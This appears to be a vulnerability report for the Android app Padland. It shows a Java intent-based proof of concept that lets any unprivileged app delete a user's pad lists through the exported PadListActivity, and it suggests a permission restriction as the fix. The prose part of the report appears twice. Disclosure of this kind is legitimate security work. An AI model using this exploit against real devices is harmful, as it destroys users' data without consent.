Hello, I found a vulnerability in exported activity PadListActivity in the latest version. This vulnerability allows any app without any permission to delete any pad list. The following commands are used to reproduce it:
Intent intent = new Intent();
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
ComponentName cn=new ComponentName("com.mikifus.padland","com.mikifus.padland.PadListActivity");
intent.setComponent(cn);
Bundle ExtrasObj = new Bundle();
ArrayList pad_id_list = new ArrayList();
pad_id_list.add("1"); // add the nums to be deleted
ExtrasObj.putStringArrayList("pad_id", pad_id_list);
intent.putExtra("action", "delete");
intent.putExtras(ExtrasObj);
startActivity(intent);
Suggestion: Adding a permission restriction if keeping PadListActivity as exported
Hello, I found a vulnerability in exported activity PadListActivity in the latest version. This vulnerability allows any app without any permission to delete any pad list. The following commands are used to reproduce it:
Suggestion: Adding a permission restriction if keeping PadListActivity as exported